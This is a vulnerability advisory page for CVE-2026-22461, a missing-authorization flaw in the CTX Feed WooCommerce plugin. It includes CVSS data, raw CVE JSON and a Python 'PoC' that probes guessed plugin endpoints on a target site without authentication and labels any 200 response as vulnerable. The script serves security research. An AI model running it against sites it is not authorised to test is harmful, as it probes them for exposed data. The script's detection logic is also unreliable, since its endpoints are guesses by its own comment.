Security Vulnerability Report
中文
CVE-2026-22461 CVSS 5.3 MEDIUM

CVE-2026-22461

Published: 2026-01-22 17:16:35
Last Modified: 2026-04-15 00:35:42

Description

Missing Authorization vulnerability in WebAppick CTX Feed webappick-product-feed-for-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects CTX Feed: from n/a through <= 6.6.18.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WebAppick CTX Feed <= 6.6.18 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2026-22461 PoC - Missing Authorization in CTX Feed Plugin # Target: WordPress site with WebAppick CTX Feed plugin <= 6.6.18 def check_vulnerability(target_url): """ Check if the target is vulnerable to CVE-2026-22461 Missing Authorization vulnerability in CTX Feed plugin """ vulnerabilities = [] # Common CTX Feed endpoints that may be accessible without authorization endpoints = [ '/wp-admin/admin-ajax.php?action=ctx_feed_generation', '/wp-admin/admin-ajax.php?action=ctx_download_feed', '/wp-json/ctx/v1/feed', '/wp-json/ctx/v1/products', '/?feed=ctx-product-feed', '/wp-content/uploads/ctx-feeds/' ] for endpoint in endpoints: url = target_url.rstrip('/') + endpoint try: response = requests.get(url, timeout=10, verify=False) # Check if endpoint is accessible without authentication if response.status_code == 200: # Check for sensitive data exposure content_type = response.headers.get('Content-Type', '') if 'json' in content_type or 'xml' in content_type or 'text' in content_type: vulnerabilities.append({ 'endpoint': endpoint, 'status': 'VULNERABLE', 'content_type': content_type, 'response_size': len(response.content) }) except requests.RequestException as e: print(f"Error testing {endpoint}: {e}") return vulnerabilities if __name__ == '__main__': if len(sys.argv) < 2: print("Usage: python cve-2026-22461-poc.py <target_url>") print("Example: python cve-2026-22461-poc.py http://example.com") sys.exit(1) target = sys.argv[1] print(f"[*] Scanning {target} for CVE-2026-22461...") results = check_vulnerability(target) if results: print("\n[!] Vulnerable endpoints found:") for vuln in results: print(f" - {vuln['endpoint']} ({vuln['status']})") else: print("[*] No obvious vulnerabilities detected")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22461", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:34.910", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in WebAppick CTX Feed webappick-product-feed-for-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects CTX Feed: from n/a through <= 6.6.18."}, {"lang": "es", "value": "Vulnerabilidad de Falta de Autorización en WebAppick CTX Feed webappick-product-feed-for-woocommerce permite explotar niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a CTX Feed: desde n/a hasta &lt;= 6.6.18."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/webappick-product-feed-for-woocommerce/vulnerability/wordpress-ctx-feed-plugin-6-6-15-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}